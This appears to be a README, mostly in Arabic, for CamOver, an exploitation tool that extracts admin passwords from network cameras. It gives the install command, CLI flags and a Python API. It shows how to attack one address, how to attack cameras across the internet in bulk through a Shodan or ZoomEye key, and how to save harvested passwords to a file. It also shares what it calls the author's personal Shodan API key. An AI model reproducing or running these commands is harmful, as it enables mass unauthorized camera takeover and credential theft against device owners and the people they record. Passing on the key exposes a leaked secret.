
CamOver هي أداة استغلال كاميرات تسمح بالكشف عن كلمة مرور المشرف لكاميرا الشبكة.
كام أوفر هي أداة استغلال كاميرات تسمح بالكشف عن كلمة مرور مسؤول الكاميرا الشبكية.
CCTV و GoAhead و Netwave.pip3 install git+https://github.com/EntySec/CamOver
لاستخدام كام أوفر، اكتب camover في الطرفية.
usage: camover [-h] [-t] [-o OUTPUT] [-i INPUT] [-a ADDRESS] [--shodan SHODAN]
[--zoomeye ZOOMEYE] [-p PAGES]
CamOver is a camera exploitation tool that allows to disclosure network camera
admin password.
optional arguments:
-h, --help show this help message and exit
-t, --threads Use threads for fastest work.
-o OUTPUT, --output OUTPUT
Output result to file.
-i INPUT, --input INPUT
Input file of addresses.
-a ADDRESS, --address ADDRESS
Single address.
--shodan SHODAN Shodan API key for exploiting devices over Internet.
--zoomeye ZOOMEYE ZoomEye API key for exploiting devices over Internet.
-p PAGES, --pages PAGES
Number of pages you want to get from ZoomEye.
استغلال كاميرا واحدة
لنخترق كاميرتي من أجل المتعة فقط.
camover -a 192.168.99.100
استغلال كاميرات من الإنترنت
لنجرب استخدام محرك بحث Shodan لاستغلال الكاميرات عبر الإنترنت، وسنستخدمه مع -t للتسريع.
camover -t --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD
ملاحظة: مفتاح API الخاص بـ Shodan المعطى (PSKINdQe1GyxGgecYz2191H2JoS9qvgD) هو مفتاح PRO الخاص بي، يمكنك استخدام هذا المفتاح أو مفتاحك الخاص، فلا تتردد في استخدام جميع مواردنا مجانًا :)
استغلال كاميرات من ملف إدخال
لنجرب استخدام قاعدة بيانات مفتوحة للكاميرات مع -t للتسريع.
camover -t -i cameras.txt -o passwords.txt
ملاحظة: سيقوم باستغلال جميع الكاميرات في قائمة cameras.txt حسب عناوينها وحفظ جميع كلمات المرور التي تم الحصول عليها في passwords.txt.
كام أوفر تمتلك أيضًا واجهة برمجة تطبيقات خاصة بها بلغة Python يمكن استدعاؤها عن طريق استيراد CamOver إلى الكود الخاص بك.
from camover import CamOver
هذه هي جميع الدوال الأساسية في كام أوفر التي يمكن استخدامها لاستغلال كاميرا معينة.
exploit(address) - استغلال كاميرا واحدة بواسطة العنوان المعطى.استغلال كاميرا واحدة
from camover import CamOver
camover = CamOver()
creds = camover.exploit('192.168.99.100')
print(creds)